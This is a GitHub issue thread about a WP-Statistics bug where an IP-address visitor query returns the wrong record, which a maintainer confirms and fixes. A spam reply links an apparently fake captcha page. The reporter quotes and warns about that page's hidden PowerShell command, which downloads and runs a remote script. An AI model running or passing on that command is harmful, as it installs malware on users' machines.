### ISSUE TITLE
query visitor data by IP address in WP-Statistics

### ISSUE THREAD

**Issue by LiangYongAI** [wp-statistics/wp-statistics#573]
because My previous issue is closed, I create a new issue here.

I am currently using the method provided in a previous response to query visitor data by IP address in WP-Statistics:

![image](https://github.com/user-attachments/assets/a366f3e1-5bea-45eb-892f-e7e52cda96f1)

However, when I input an IP address that is stored as plaintext in the database, the method seems to return the first record in the table, regardless of the IP entered.

Upon further inspection, I realized that this issue might be due to the way the IP address is handled by the getVisitorData() method. I suspect the method hashes the input IP before querying the database. In my case, the WP-Statistics settings is disabled hash IP addresses, and the IP addresses are now stored as plaintext.
![image](https://github.com/user-attachments/assets/078d0300-f4a4-4979-8166-2af7d1d7f80b)

when I query ip: 71.65.169.203,but the query result is :
![image](https://github.com/user-attachments/assets/578a9c01-73c9-4486-82bf-50328c8385a4)

To further explain why the query result shows a hashed IP: when I first installed WP-Statistics, the default setting was to store hashed IP addresses. Later, I changed the configuration to store plaintext IP addresses. After checking the database, it seems that the query always returns the first record in the database.

Therefore, it seems the method is hashing the input IP, but the database contains plaintext IP addresses, resulting in no match and thus always returning the first record.

Question: Is there a way to adjust this method to account for plaintext IPs stored in the database? If not, would you suggest a workaround for querying visitor data when the database contains plaintext IP addresses instead of hashed ones?

Thank you for your help! @mhdizmni

**Comment by LiangYongAI** [comment]
@mhdizmni can you help me?

**Comment by thegamerjedbest45454** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by LiangYongAI** [comment]
I think it is risk to execute "powershell -WindowStyle Hidden ([ScriptBlock]::Create((irm https://javierlopez.eu/adapt/kingdom))).Invoke()"
![image](https://github.com/user-attachments/assets/40e4e897-396e-45fa-97c1-e73928c89df9)

**Comment by mhdizmni** [comment]
@LiangYongAI 
Thank you for your patience, and we apologize for the delayed response.

After reviewing and checking the method, I can confirm that there is an issue.

I have notified our team about this matter to further investigate.

Kindly note that due to a high volume of support requests and certain technical constraints, our response times may be slower than usual. We appreciate your understanding and will address the issue as soon as possible.

**Comment by mhdizmni** [comment]
Hi @LiangYongAI,

I'm pleased to inform you that we have addressed the issue in [this commit](https://github.com/wp-statistics/wp-statistics/commit/c90d00095e2963d83f159d46fda60605748eadea).

This fix will be available in an upcoming release.

In the meantime, you can use [the development version](https://github.com/wp-statistics/wp-statistics/tree/development) of WP Statistics.

Thank you for your understanding and patience.

Regards

**Comment by LiangYongAI** [comment]
It works, thanks!

**Comment by LiangYongAI** [comment]
@mhdizmni recently I continue to use the above method to do further reseach, I noticed that some area I concerned is empty.
           [first_view] => 
            [first_page] => 
            [first_uri] => 
I want to get the fisrt hit time, How can I do? thanks
![image](https://github.com/user-attachments/assets/714811c2-4c90-4f9d-a907-ad3a68eee8e0)
